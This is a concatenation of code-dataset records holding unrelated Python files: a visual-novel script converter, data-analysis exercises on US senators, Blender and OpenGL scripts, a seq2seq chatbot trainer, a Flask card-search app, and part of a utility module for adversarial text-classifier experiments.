28\r\n\r\n charaname_dialogue_separator = CharanameDialogueSeparator()\r\n paragraph_separator = ParagraphSeparator(max_line_num, max_chara_num_in_line)\r\n line_breaker = LineBreaker(max_line_num, appropriate_max_chara_num_in_line)\r\n\r\n with open('Event01.ks', 'w', encoding='utf-8', newline='\\n') as fw:\r\n fw.write('[tb_start_text mode=4]\\n')\r\n with open('Event01.txt', encoding='utf-8') as fr:\r\n readed_lines = fr.readlines()\r\n last_bracket_flag = False\r\n first_flag = True\r\n for readed_line in readed_lines:\r\n dialog_flag = False\r\n readed_line = readed_line.replace('\\n', '')\r\n\r\n # 改行のみの行を飛ばす\r\n if len(readed_line) == 0:\r\n continue\r\n\r\n # 発言者\r\n if readed_line[0] == '#':\r\n if not first_flag:\r\n fw.write('[_tb_end_text]\\n\\n[tb_start_text mode=4]\\n')\r\n charaname, readed_line = charaname_dialogue_separator.separate(readed_line)\r\n fw.write(charaname + '\\n')\r\n dialog_flag = True\r\n # 台詞の次の行で、かつ台詞じゃない場合は地の文の開始\r\n elif last_bracket_flag:\r\n fw.write('[_tb_end_text]\\n\\n[tb_start_text mode=4]\\n#\\n')\r\n last_bracket_flag = False\r\n\r\n if first_flag:\r\n first_flag = False\r\n\r\n if readed_line[0] == ' ':\r\n readed_line = readed_line[1:]\r\n\r\n paragraphs = paragraph_separator.separate(readed_line)\r\n for paragraph in paragraphs:\r\n breaked_lines = line_breaker.break_line(paragraph)\r\n for i, breaked_line in enumerate(breaked_lines):\r\n break_symbol = '[p]\\n' if i == len(breaked_lines) - 1 else '[r]\\n'\r\n if dialog_flag and i > 0:\r\n breaked_line = '_ ' + breaked_line\r\n fw.write(breaked_line + break_symbol)\r\n if breaked_line[-1] == '」':\r\n last_bracket_flag = True\r\n\r\n fw.write('[_tb_end_text]\\n')\r\n\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"kanosawa/text2tyrano","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"69987503097","text":"List = list(map(int, input().strip().split()))\nflag = False\nIs = [False, False, False, False, False]\nans = [0, 0, 0, [], 0]\nfor i in range(1, List[0] + 1):\n if (List[i] % 10 < 1):\n Is[0] = True\n ans[0] += List[i]\n if (List[i] % 5 == 1):\n Is[1] = True\n ans[1] += (-1)**int(flag) * List[i]\n flag = not flag\n if (List[i] % 5 == 2):\n Is[2] = True\n ans[2] += 1\n if (List[i] % 5 == 3):\n Is[3]= True\n ans[3].append(List[i])\n if (List[i] % 5 == 4):\n Is[4] = True\n ans[4]= max(ans[4], List[i])\n\nprint(ans[0] if Is[0] else 'N', ans[1] if Is[1] else 'N', ans[2] if Is[2] else 'N',\n ('%.1f' % (sum(ans[3])/len(ans[3]))) if Is[0] else 'N', ans[4] if Is[4] else 'N')\n","repo_name":"JacketPants/Problem-OJ","sub_path":"contest/牛客网PAT模拟题/BasicLevel_Real/1002.py","file_name":"1002.py","file_ext":"py","file_size_in_byte":750,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"22"} +{"seq_id":"3911868429","text":"# Python Practice Exercises\n# -------------------------\n# \n# Thanks to Luke Cherveny for creating these Python exercises.\n# \n# Data file\n# ---------\n# \n# The file senate_2022.csv contains data on the 100 current members\n# of the United States Senate. It is a cleaned copy/paste from Wikipedia:\n# https://en.wikipedia.org/wiki/List_of_current_United_States_senators\n#\n# Variables include:\n# \n# * Name: Senator name\n# * State: State the senator represents\n# * Party: Official political affiliation \n# * BirthDate: Date of Birth (along with age)\n# * Occupation: Declared occupation(s), separated by commas\n# * PreviousOffice: Previously held elected offices, separated by commas\n# * Education: College/University and degree, separated by commas\n# * AssumedOffice: Date senate seat assumed\n# * Election: Year the senator's seat is up for election\n# * Residence: Senator official city of residence (in the state they represent)\n\n# ## Question 1\n# \n# Load the .csv as a pandas DataFrame\n\n# Solution to Question 1\n\nimport pandas as pd\ndf = pd.read_csv( 'senate_2022.csv' )\n# print( df ) # uncomment this line to see the dataset printed\n\n\n# ## Question 2\n# \n# Make a list of the states that have Senate elections this year.\n\n# Solution to Question 2\n\nanswer2 = df[df.Election == 2022].State.unique()\n# print( answer2 ) # uncomment this line to see the answer printed\n\n\n# ## Question 3\n# \n# What is the political make up of the US Senate?\n\n# Solution to Question 3\n\nanswer3 = df.Party.value_counts()\n# print( answer3 ) # uncomment this line to see the answer printed\n\n\n# ## Question 4\n# \n# Which senators have a JD?\n\n# Solution to Question 4 (assuming no school contains the initials \"JD\" in it...)\n\nanswer4 = df[df.Education.str.contains( 'JD' )]\n# print( answer4 ) # uncomment this line to see the answer printed\n\n\n# ## Question 5\n# \n# Which senator names have more than two words?\n\n# Solution to Question 5\n\nname_parts = df.Name.str.split()\nnum_parts = name_parts.apply( len )\nanswer5 = df[num_parts > 2].Name\n# print( answer5 ) # uncomment this line to see the answer printed\n\n\n# ## Question 6\n# \n# Change each senator's hometown to include the state, e.g. \"Cambridge\" becomes \"Cambridge, Massachusetts\".\n\n# Solution to Question 6\n\ndf.Residence = df.Residence + ', ' + df.State\n# print( df[['Name','Residence']] ) # uncomment this line to see the results\n\n\n# ## Question 7\n# \n# Make a new variable for just the age of each senator and sort the senators by age.\n\n# Solution to Question 7\n\ndf['Age'] = df.BirthDate.str[-3:-1].astype( int )\ndf = df.sort_values( by='Age' )\n# print( df ) # uncomment this line to see the results\n\n\n# ## Question 8\n# \n# Make a new variable for whether a senator was in the U.S. House.\n\n# Solution to Question 8\n\ndf['WasInHouse'] = df.PreviousOffice.str.contains( 'U.S. House' )\n# print( df ) # uncomment this line to see the results\n\n\n# ## Question 9\n# \n# Which senator has the most declared occupations?\n\n# Solution to Question 9\n\ndf['NumOccupations'] = df.Occupation.str.split( ',' ).apply( len )\nanswer9 = df.sort_values( by='NumOccupations', ascending=False ).head()\n# print( answer9 ) # uncomment this line to see the answer printed\n\n\n# ## Question 10\n# \n# In which states are both seats in the Senate controlled by the same party?\n\n# Solution to Question 10\n\ndef has_only_one_party ( state_name ):\n return len( df[df.State == state_name].Party.unique() ) == 1\nanswer10 = [ state for state in df.State.unique() if has_only_one_party( state ) ]\n# print( answer10 ) # uncomment this line to see the answer printed\n\n\n# ## Question 11\n# \n# Make a histogram of senator ages.\n\n# Solution to Question 11\n# NOTE: Only the df.Age.plot.hist() line is strictly necessary.\n# The rest just make the plot readable.\nimport matplotlib.pyplot as plt\ndf.Age.plot.hist()\nplt.title( 'Distribution of Senator Ages' )\nplt.xlabel( 'Age' )\n# plt.show() # uncomment this line to show the plot in a popup\n\n\n# ## Question 12\n# \n# How does average age for republican senators compare to average age for democratic senators?\n# \n# Challenge: Make side-by-side box plots to compare the age distribution by party.\n\n# Solution to Question 12 (challenge solution is further below)\n\nanswer12 = df.groupby( 'Party' )['Age'].mean()\n# print( answer12 ) # uncomment this line to see the answer printed\n\n# Solution to Question 12's Challenge\n\n# df.boxplot( column='Age', by='Party' ) # uncomment this line to see the plot in a popup\n\n\n# ## Question 13\n# \n# Which senator has been in the senate the longest?\n# \n# (Hint: You don't *need* to use datetimes, but the solution is cleaner if you do.)\n\n# Solution to Question 13\n\nimport datetime\n# Convert \"AssumedOffice\" column into Python datetime objects for use in computation:\ndf.AssumedOffice = pd.to_datetime( df.AssumedOffice )\n# Subtract each \"AssumedOffice\" time from now, to find the total time in office so far:\nnow = datetime.datetime.now()\ndf['TimeInOffice'] = now - df.AssumedOffice\n# Show the table sorted by that value, decreasing:\nanswer13 = df.sort_values( by='TimeInOffice', ascending=False ).head()\n# print( answer13 ) # uncomment this line to see the answer printed\n\n\n# ## Question 14 - Challenge\n# \n# Which senator was the oldest when they assumed office?\n# \n# (Hint: You definitely need datetimes for this one.)\n\n# Solution to Question 14\n\n# Convert the BirthDate column into a Python datetime, for use in computations:\n# (Note that we have to drop the end of each BirthDate, where it has the age.)\ndf['BirthDatetime'] = pd.to_datetime( df.BirthDate.str[:-9] )\n# Compute the Senator's age when they assumed office:\ndf['AgeWhenAssumedOffice'] = df.AssumedOffice - df.BirthDatetime\n# Show the table sorted by that value, decreasing:\nanswer14 = df.sort_values( by='AgeWhenAssumedOffice', ascending=False ).head()\n# print( answer14 ) # uncomment this line to see the answer printed\n\n\n# ## Question 15 - Challenge\n# \n# Which college/university granted the most degrees to Senate members?\n# \n# (Hint: You probably need regular expressions for this one.)\n\n# Solution to Question 15\n\n# NOTE: To help the reader understand this solution, I suggest running each line separately,\n# in a cell on its own, to see the value of its output alone.\n# Break each Senator's education up at the commas:\neducation_parts = df.Education.str.split( ', ' )\n# Flatten all those results into one big list for all Senators:\nschools_and_more = [ text for parts in education_parts for text in parts ]\n# Drop little bits that don't contain any school names:\nwithout_junk = [ text for text in schools_and_more if '(' in text ]\n# Erase the degree from the end of each piece of text, leaving only the school name:\njust_schools = [ text[:text.index( '(' )] for text in without_junk ]\n# Build a frequency table from that list of school names:\nanswer15 = pd.Series( just_schools ).value_counts()\n# print( answer15 ) # uncomment this line to see the answer printed\n\n","repo_name":"bentley-cads/intro-python-workshop","sub_path":"exercises-with-solutions.py","file_name":"exercises-with-solutions.py","file_ext":"py","file_size_in_byte":6906,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"69945750137","text":"import bpy\nimport math\nimport mathutils\n\ndef spherical(radius, phi, theta):\n x = radius * math.sin(phi) * math.cos(theta)\n y = radius * math.sin(phi) * math.sin(theta)\n z = radius * math.cos(phi)\n return mathutils.Vector((x, y, z))\n\ndef show():\n scene = bpy.context.scene\n for obj in scene.objects:\n print(obj.name)\n\ndef remove(name):\n bpy.ops.object.select_all(action='DESELECT')\n bpy.data.objects[name].select = True\n bpy.ops.object.delete()\n\ndef light(at):\n bpy.ops.object.select_all(action='DESELECT')\n lamp_data = bpy.data.lamps.new(name='Lamp', type='POINT')\n lamp_data.energy = 10\n lamp_object = bpy.data.objects.new(name='Lamp', object_data=lamp_data)\n lamp_object.location = at\n bpy.context.scene.objects.link(lamp_object)\n\ndef camera(at):\n camera = bpy.data.objects['Camera']\n origin = mathutils.Vector((0, 0, 0))\n anchor = camera.matrix_world.to_translation()\n direction = origin - at\n rot_quat = direction.to_track_quat('-Z', 'Y')\n camera.rotation_euler = rot_quat.to_euler()\n camera.location = at\n\nbpy.ops.import_scene.obj(filepath='/brick.obj')\nremove('Cube')\nremove('Plane')\nremove('Lamp')\nat = spherical(15, math.radians(45), math.radians(315))\nlight(at)\ncamera(at)\nshow()\n\nbpy.context.scene.render.filepath = '/output/rendering.png'\nbpy.context.scene.render.resolution_x = 800\nbpy.context.scene.render.resolution_y = 600\n\nbpy.ops.render.render(write_still=True)\n","repo_name":"gmamaladze/rotating-bricks","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"22"} +{"seq_id":"25788013584","text":"import pygame\nfrom pygame.locals import *\nfrom OpenGL.GL import *\nfrom OpenGL.GLU import *\nfrom math import *\nfrom numpy import *\npoints = []\ngraph = []\nxcordconnect=-200\nconnect1 = 0\nconnect2 =1\nverticies = [\n (0, -1, -0),\n (0,1, 0),\n (1, 0, -0),\n (-1,0, 0),\n (0, 0, -1),\n (0,0, 1)\n]\nedges = [\n (0,1),\n (2,3),\n (4,5)\n]\nx= 0\nx_cord = ()\nmax_x = 10\nxcord1 = -10\nprint(x_cord)\nwhile xcord1 < max_x:\n x_cord = list(x_cord)\n x_cord.append(xcord1)\n x_cord = tuple(x_cord)\n xcord1 += .1\n graph.append((connect1,connect2))\n connect1 +=1\n connect2 +=1\n\ndef formula(a):\n transformations = \"(-x)**.5\"\n varplace = transformations.find(\"x\")\n return transformations.replace(\"x\", str(a))\nfor number in x_cord:\n expression = formula(number)\n print (expression)\n y = eval(expression)\n if (y.imag) == 0:\n print (y)\n point = (number, y, 0)\n print (point)\n points.append(point)\n print (points)\n elif (y.real) ==0:\n z = y.imag\n print (z)\n point = (number, 0, z)\n print (point)\n points.append(point)\n print (points)\n else:\n z = y.imag\n print (z)\n point = (number, y.real, z)\n print (point)\n points.append(point)\n print (points)\ndef Graph():\n try:\n for edge in graph:\n for point in edge:\n glVertex3fv(points[point])\n except:\n pass\n\ndef Cube():\n try:\n for edge in edges:\n for vertex in edge:\n glVertex3fv(verticies[vertex])\n except:\n pass\ndef main():\n pygame.init()\n display = (800,600)\n pygame.display.set_mode(display, DOUBLEBUF|OPENGL)\n gluPerspective(45, (display[0]/display[1]), 0.1, 50.0)\n glTranslatef(0.0,0.0, -5)\n glRotatef(0, 0, 0, 0)\n\n while True:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n quit()\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_LEFT:\n glTranslatef(-1.0,0.0,0)\n if event.key == pygame.K_RIGHT:\n glTranslatef(1.0,0.0,0)\n if event.key == pygame.K_UP:\n glTranslatef(0.0,1.0,0)\n if event.key == pygame.K_DOWN:\n glTranslatef(0.0,-1.0,0)\n if event.key == pygame.K_w:\n print (\"you pressed w\")\n glRotatef(1, 10, 0, 0)\n if event.key == pygame.K_s:\n glRotatef(1, -10, 0, 0)\n if event.key == pygame.K_a:\n glRotatef(1, 0, 90, 0)\n if event.key == pygame.K_d:\n glRotatef(1, 0, -90, 0)\n\n if event.type == pygame.MOUSEBUTTONDOWN:\n if event.button == 4:\n glTranslatef(0,0,1.0)\n if event.button == 5:\n glTranslatef(0,0,-1.0)\n glClear(GL_COLOR_BUFFER_BIT|GL_DEPTH_BUFFER_BIT)\n glBegin(GL_LINES)\n Cube()\n Graph()\n glEnd()\n pygame.display.flip()\n pygame.time.wait(1)\nmain()\n","repo_name":"wizardwatch/graphing-calculator-with-imaginary-numbers","sub_path":"old.py","file_name":"old.py","file_ext":"py","file_size_in_byte":3193,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"22"} +{"seq_id":"41242531560","text":"from time import time\nimport os\n\nimport torch\nfrom nltk.translate.bleu_score import sentence_bleu\n\n# 导入之前写好的函数或类\nfrom util import (vocab, GreedySearchDecoder, PAD_token, SOS_token, EOS_token,\n UNK_token, parse_arg, trimAndReplace, DataLoader,\n train_one_batch)\nfrom model import EncoderRNN, LuongAttentionDecoderRNN\n\n\ndef train(args):\n # 超参\n BATCH_SIZE = args.batch_size\n MAX_LENGTH = args.max_length\n MIN_COUNT = args.min_count\n TEACHER_FORCING_RATIO = args.teacher_forcing_ratio\n LEARNING_RATE = args.learning_rate\n CLIP = args.clip\n\n # 网络参数\n hidden_size = args.hidden_dim\n encoder_n_layers = args.encoder_n_layers\n decoder_n_layers = args.decoder_n_layers\n dropout = args.dropout\n\n # 轮数与打印间隔\n epoch = args.epoch\n print_interval = args.print_interval\n save_interval = args.save_interval\n\n # 设备\n device = args.device\n save_dir = args.save_dir\n root = args.root\n\n mask_loss_all = []\n\n # 定义训练一个batch的逻辑\n # 在这个batch中更新网络时,有一定的概率会使用teacher forcing的方法来加速收敛, 这个概率为teacher_forcing_ratio\n\n # 开始训练\n print(\"build vocab_list...\")\n # 首先构建字典\n voc = vocab(name=\"corpus\",\n pad_token=PAD_token,\n sos_token=SOS_token,\n eos_token=EOS_token,\n unk_token=UNK_token)\n # 载入数据\n data_path = os.path.join(root, 'dialog.tsv')\n pairs = voc.load_data(data_path)\n\n print(f\"load {len(pairs)} dialogs successfully\")\n # 对数据进行裁剪\n pairs = trimAndReplace(voc=voc, pairs=pairs, min_count=MIN_COUNT)\n print(f\"there are {voc.num_words} words in the vocab\")\n\n # 定义词向量嵌入矩阵\n embedding = torch.nn.Embedding(num_embeddings=voc.num_words,\n embedding_dim=hidden_size,\n padding_idx=PAD_token)\n # 获取encoder和decoder\n encoder = EncoderRNN(hidden_size=hidden_size,\n embedding=embedding,\n n_layers=encoder_n_layers,\n dropout=dropout)\n\n decoder = LuongAttentionDecoderRNN(score_name=\"dot\",\n embedding=embedding,\n hidden_size=hidden_size,\n output_size=voc.num_words,\n n_layers=decoder_n_layers,\n dropout=dropout)\n encoder = encoder.to(device)\n decoder = decoder.to(device)\n\n # 为encoder和decoder分别定义优化器\n encoder_optimizer = torch.optim.Adam(encoder.parameters(),\n lr=LEARNING_RATE)\n decoder_optimizer = torch.optim.Adam(decoder.parameters(),\n lr=LEARNING_RATE)\n\n # 定义优化器学习率的衰减策略\n # encoder_lr_scheduler = torch.optim.lr_scheduler.LambdaLR(optimizer=encoder_optimizer,\n # # lr_lambda=Triangular2(T_max=300, gamma=0.5))\n # # decoder_lr_scheduler = torch.optim.lr_scheduler.LambdaLR(optimizer=decoder_optimizer,\n # # lr_lambda=Triangular2(T_max=300, gamma=0.5))\n\n encoder_lr_scheduler = None\n decoder_lr_scheduler = None\n\n global_step = 0\n start_time = time()\n encoder.train()\n decoder.train()\n\n print(\"start to train...\")\n\n # 轮数遍历\n for epoch in range(epoch):\n print(\"-\" * 20)\n print(\"Epoch : \", epoch)\n # 获取loader\n train_loader = DataLoader(pairs=pairs,\n voc=voc,\n batch_size=BATCH_SIZE,\n shuffle=True)\n # 遍历生成器\n for batch_num, batch in enumerate(train_loader):\n global_step += 1\n # batch中的信息 : [\"input_tensor\", \"input_length_tensor\", \"output_tensor\", \"mask\", \"max_length\"]\n loss = train_one_batch(input_seq=batch[0],\n input_length=batch[1],\n device=device,\n target=batch[2],\n mask=batch[3],\n max_target_len=batch[4],\n encoder=encoder,\n decoder=decoder,\n encoder_optimizer=encoder_optimizer,\n decoder_optimizer=decoder_optimizer,\n batch_size=BATCH_SIZE,\n clip=CLIP,\n teacher_forcing_ratio=TEACHER_FORCING_RATIO,\n encoder_lr_scheduler=encoder_lr_scheduler,\n decoder_lr_scheduler=decoder_lr_scheduler)\n\n mask_loss_all.append(loss)\n\n if global_step % print_interval == 0:\n print(\n \"Epoch : {}\\tbatch_num : {}\\tloss: {:.6f}\\ttime point : {:.2f}s\\tmodel_lr : {:.10f}\"\n .format(epoch, batch_num, loss,\n time() - start_time,\n encoder_optimizer.param_groups[0][\"lr\"]))\n\n # 将check_point存入./data/check_points这个文件夹中\n if global_step % save_interval == 0:\n checkpoint_name = f'{global_step}_checkpoint.tar'\n check_point_save_path = os.path.join(save_dir, checkpoint_name)\n\n torch.save(\n {\n \"iteration\": global_step,\n \"encoder\": encoder.state_dict(),\n \"decoder\": decoder.state_dict(),\n \"encoder_optimizer\": encoder_optimizer.state_dict(),\n \"decoder_optimizer\": decoder_optimizer.state_dict(),\n # \"encoder_lr_scheduler\" : encoder_lr_scheduler.state_dict(),\n # \"decoder_lr_scheduler\" : decoder_lr_scheduler.state_dict(),\n \"loss\": loss,\n \"voc_dict\": voc.__dict__,\n \"embedding\": embedding.state_dict()\n },\n check_point_save_path)\n\n print(f\"save model to {check_point_save_path}\")\n\n\ndef test(args):\n # 载入模型和字典\n load_path = args.state_dict\n MAX_LENGTH = args.max_length\n\n # 网络参数\n hidden_size = args.hidden_dim\n encoder_n_layers = args.encoder_n_layers\n decoder_n_layers = args.decoder_n_layers\n dropout = args.dropout\n\n # 模型有可能是在gpu上训练的,需要先把模型参数转换成cpu可以运算的类型\n checkpoint = torch.load(load_path, map_location=torch.device(\"cpu\"))\n\n encoder_state_dict = checkpoint[\"encoder\"]\n decoder_state_dict = checkpoint[\"decoder\"]\n embedding_state_dict = checkpoint[\"embedding\"]\n voc_dict = checkpoint[\"voc_dict\"]\n\n # 初始化,词向量矩阵、encoder、decoder并载入参数\n embedding = torch.nn.Embedding(num_embeddings=voc_dict[\"num_words\"],\n embedding_dim=hidden_size,\n padding_idx=voc_dict[\"pad_token\"])\n embedding.load_state_dict(embedding_state_dict)\n\n encoder = EncoderRNN(hidden_size=hidden_size,\n embedding=embedding,\n n_layers=encoder_n_layers,\n dropout=dropout)\n\n decoder = LuongAttentionDecoderRNN(score_name=\"dot\",\n embedding=embedding,\n hidden_size=hidden_size,\n output_size=voc_dict[\"num_words\"],\n n_layers=decoder_n_layers,\n dropout=dropout)\n\n encoder.load_state_dict(encoder_state_dict)\n decoder.load_state_dict(decoder_state_dict)\n\n # 设为评估模式,网络参数停止更新\n encoder.eval()\n decoder.eval()\n\n # 实例化最终评估模型的实例\n chatbot = GreedySearchDecoder(encoder, decoder)\n\n data_path = os.path.join(args.root, 'dialog.tsv')\n bleus = []\n\n for line in open(data_path, 'r', encoding='utf-8'):\n try:\n input_dialog, output_dialog = line.strip().split(\"\\t\")\n reference = [output_dialog.split()]\n input_seq = [\n voc_dict[\"word2index\"].get(word, voc_dict[\"unk_token\"])\n for word in input_dialog.split()\n ]\n input_length = torch.tensor([len(input_seq)])\n input_seq = torch.tensor(input_seq).unsqueeze(0)\n predict_indexes, _ = chatbot(input_seq, input_length, MAX_LENGTH)\n # 将chatbot回复的index序列转为word,并将代表pad_token和eos_token的index去除\n candidate = []\n for index in predict_indexes:\n if index in [voc_dict[\"pad_token\"], voc_dict[\"eos_token\"]]:\n continue\n else:\n candidate.append(voc_dict[\"index2word\"][index])\n\n bleu = sentence_bleu(reference, candidate)\n bleus.append(bleu)\n\n except:\n pass\n\n print('avg bleu', sum(bleus) / len(bleus))\n\n\nif __name__ == \"__main__\":\n torch.manual_seed(1024)\n\n # get args\n args = parse_arg()\n for arg_name, value in args._get_kwargs():\n if isinstance(value, bool) and value:\n globals()[arg_name](args)\n","repo_name":"LSTM-Kirigaya/chatbot-based-on-seq2seq2","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":9824,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"22"} +{"seq_id":"34191476834","text":"import os\nfrom datetime import datetime\n\nfrom flask import Flask, render_template, session, redirect, url_for, flash, request\nfrom flask_bootstrap import Bootstrap\nfrom flask_moment import Moment\nfrom flask_table import Table, Col\nfrom sqlalchemy import engine_from_config\nfrom sqlalchemy.orm import scoped_session, sessionmaker\nfrom sqlalchemy.ext.declarative import declarative_base\n\nfrom website.forms import SearchForm\n\napp = Flask(__name__)\napp.config['SECRET_KEY'] = 'SjdnUends821Jsdlkvxh391ksdODnejdDw' # required for wtforms\nBootstrap(app)\nmoment = Moment(app)\n\nimport config\nengine = engine_from_config(config.DATABASE, prefix='db.')\ndb_session = scoped_session(sessionmaker(autocommit=False,\n autoflush=False,\n bind=engine))\nBase = declarative_base()\nBase.query = db_session.query_property()\n\nfrom website.models import Card # Circular import\n\nclass ItemTable(Table):\n name = Col('NAME')\n mana_cost = Col('COST')\n usd = Col('USD')\n tix = Col('TIX')\n\n@app.route('/', methods=['GET', 'POST'])\n@app.route('/index', methods=['GET', 'POST'])\ndef index():\n form = SearchForm(request.args)\n query = form.data['q']\n table = None\n if query is not None:\n items = Card.query.filter(Card.name.like('%'+query+'%')).all()\n table = ItemTable(items)\n return render_template('index.html', form=form, query=query, table=table)\n\n@app.route('/search', methods=['GET'])\ndef search():\n form = SearchForm(request.args)\n select = form.select.data\n query = request.args.get('q', None)\n table = None\n if query is not None:\n if select == 'Heirloom':\n items = Card.query.filter(Card.name.like('%'+query+'%')).filter(Card.heirloom_legal == 1).all()\n else:\n items = Card.query.filter(Card.name.like('%'+query+'%')).all()\n table = ItemTable(items)\n return render_template('index.html', form=form, query=query, table=table)\n\n@app.route('/user/
\", \"\")\n string = re.sub(r\"[^a-zA-Z0-9.]+\", \" \", string)\n\n return (\n string.strip().lower().split()\n if tokenizer is None\n else [t.text.lower() for t in tokenizer(string.strip())]\n )\n\n\ndef save_pkl(file, path):\n with open(path, \"wb\") as handle:\n pickle.dump(file, handle)\n\n\ndef load_pkl(path):\n with open(path, \"rb\") as handle:\n return pickle.load(handle)\n\n\ndef prep_seq(seq, word_to_idx, unk_token):\n assert isinstance(seq, list)\n seq_num = []\n\n for word in seq:\n try:\n seq_num.append(word_to_idx[word])\n except KeyError:\n seq_num.append(word_to_idx[unk_token])\n\n return seq_num\n\n\ndef pad(max_len, seq, token):\n assert isinstance(seq, list)\n abs_len = len(seq)\n\n if abs_len > max_len:\n seq = seq[:max_len]\n else:\n seq += [token] * (max_len - abs_len)\n\n return seq\n\n\ndef cut_raw(seq, max_len):\n assert isinstance(seq, list)\n return seq[:max_len]\n\n\ndef inference(\n inputs,\n model,\n word_to_idx,\n config,\n bert_wrapper=None,\n tokenizer=None,\n val=False,\n single=False,\n):\n softmax = nn.Softmax(dim=1)\n model.eval()\n\n if single:\n assert isinstance(inputs, str)\n inputs = [inputs]\n else:\n assert isinstance(inputs, list)\n\n if tokenizer:\n for x in inputs:\n assert isinstance(x, str)\n\n inputs = [\n pad(config.max_len, clean_str(x, tokenizer=tokenizer), config.pad_token)\n for x in inputs\n ]\n else:\n for x in inputs:\n assert isinstance(x, list)\n\n inputs = [pad(config.max_len, x, config.pad_token) for x in inputs]\n\n if config.use_BERT:\n inputs, masks = [\n list(x) for x in zip(*[bert_wrapper.pre_pro(t) for t in inputs])\n ]\n inputs, masks = torch.tensor(inputs), torch.tensor(masks)\n masks = masks.cuda() if config.gpu else masks\n else:\n inputs = torch.tensor(\n [prep_seq(x, word_to_idx, config.unk_token) for x in inputs],\n dtype=torch.int64,\n )\n masks = None\n\n inputs = inputs.cuda() if config.gpu else inputs\n\n with torch.no_grad():\n if config.use_BERT:\n outputs = model(inputs, token_type_ids=None, attention_mask=masks)\n outputs = outputs.logits\n else:\n outputs = model(inputs)\n\n outputs = softmax(outputs)\n probs = outputs.cpu().detach().numpy().tolist()\n _, preds = torch.max(outputs, 1)\n preds = preds.cpu().detach().numpy().tolist()\n\n if single:\n preds, probs = preds[0], probs[0]\n\n if val:\n return preds, outputs\n else:\n return preds, probs\n\n\ndef crossover(parent_1, parent_2):\n new_seq = []\n idx = []\n\n for i in range(len(parent_1.text)):\n if random.random() > 0.5:\n new_seq.append(parent_1.text[i])\n\n if i in parent_1.perturbed_idx:\n idx.append(i)\n else:\n new_seq.append(parent_2.text[i])\n\n if i in parent_2.perturbed_idx:\n idx.append(i)\n\n return new_seq, idx\n\n\ndef shuffle_lists(*args):\n \"\"\"\n See https://stackoverflow.com/a/36695026\n \"\"\"\n zipped = list(zip(*args))\n random.shuffle(zipped)\n return [list(x) for x in zip(*zipped)]\n\n\ndef bootstrap_sample(all_unperturbed, all_perturbed, bootstrap_sample_size=2000):\n scores_sum = {}\n perturbed_auc_scores = [score for score, _ in all_perturbed]\n perturbed_auc_labels = [1] * len(perturbed_auc_scores)\n unperturbed_auc_labels = [0] * len(perturbed_auc_scores)\n pos = len(all_perturbed)\n t_p = [l for _, l in all_perturbed].count(1)\n f_n = pos - t_p\n\n for _ in range(bootstrap_sample_size):\n neg = pos\n sample = random.sample(all_unperturbed, neg)\n f_p = [l for _, l in sample].count(1)\n t_n = neg - f_p\n unperturbed_auc_scores = [score for score, _ in sample]\n\n scores = compute_scores(\n perturbed_auc_scores + unperturbed_auc_scores,\n perturbed_auc_labels + unperturbed_auc_labels,\n pos,\n neg,\n t_p,\n t_n,\n f_p,\n f_n,\n )\n\n for name, score in scores.items():\n try:\n scores_sum[name].append(score)\n except KeyError:\n scores_sum[name] = [score]\n\n return scores_sum\n\n\ndef get_ci(data, alpha=0.05):\n return stats.DescrStatsW(data).tconfint_mean(alpha=alpha)\n\n\ndef compute_scores(probs_one, labels, pos, neg, t_p, t_n, f_p, f_n, round_scores=False):\n assert t_p + f_n == pos\n assert t_n + f_p == neg\n assert len(probs_one) == pos + neg == len(labels)\n\n scores = {\n \"auc\": roc_auc_score(labels, probs_one),\n \"tpr\": t_p / pos if pos > 0 else 0,\n \"fpr\": f_p / neg if neg > 0 else 0,\n \"tnr\": t_n / neg if neg > 0 else 0,\n \"fnr\": f_n / pos if pos > 0 else 0,\n \"pr\": t_p / (t_p + f_p) if t_p + f_p > 0 else 0,\n \"re\": t_p / (t_p + f_n) if t_p + f_n > 0 else 0,\n \"f1\": (2 * t_p) / (2 * t_p + f_p + f_n) if 2 * t_p + f_p + f_n > 0 else 0,\n \"acc\": (t_p + t_n) / (pos + neg) if pos + neg > 0 else 0,\n }\n\n if round_scores:\n scores = {k: np.round(v * 100, 1) for k, v in scores.items()}\n\n return scores\n\n\ndef print_model_state_dict(logger, model):\n \"\"\"\n See https://pytorch.org/tutorials/beginner/saving_loading_models.html\n See https://discuss.pytorch.org/t/how-do-i-check-the-number-of-parameters-of-a-model/4325/9\n \"\"\"\n logger.log.info(\"Model state dict:\")\n\n for param_tensor in model.state_dict():\n logger.log.info(\n \"{}\\t{}\".format(param_tensor, model.state_dict()[param_tensor].size())\n )\n\n logger.log.info(\n \"Num params: {}\".format(\n sum([x.numel() for x in model.parameters() if x.requires_grad])\n )\n )\n\n\ndef attack_time_stats(logger, exec_times, curr_attack_time, num_remaining):\n time_used = sum(exec_times)\n time_remaining = np.mean(exec_times) * num_remaining\n\n logger.log.info(\n \"Total time elapsed: {} secs OR {} mins OR {} hrs\".format(\n np.round(time_used, 2),\n np.round(time_used / 60, 2),\n np.round(time_used / 3600, 2),\n )\n )\n logger.log.info(\n \"Time needed for this attack: {}\".format(np.round(curr_attack_time, 2))\n )\n logger.log.info(\n \"Average time per attack so far: {}\".format(np.round(np.mean(exec_times), 2))\n )\n logger.log.info(\n \"ETA: {} secs OR {} mins OR {} hrs\".format(\n np.round(time_remaining, 2),\n np.round(time_remaining / 60, 2),\n np.round((time_remaining / 3600), 2),\n )\n )\n\n\ndef load_attack_mat(config, logger):\n \"\"\"\n Source: https://github.com/nesl/nlp_adversarial_examples (modified)\n \"\"\"\n if not os.path.exists(config.path_to_attack_dist_mat):\n attack_dist_mat_word_to_idx = {}\n attack_dist_mat_idx_to_word = {}\n\n 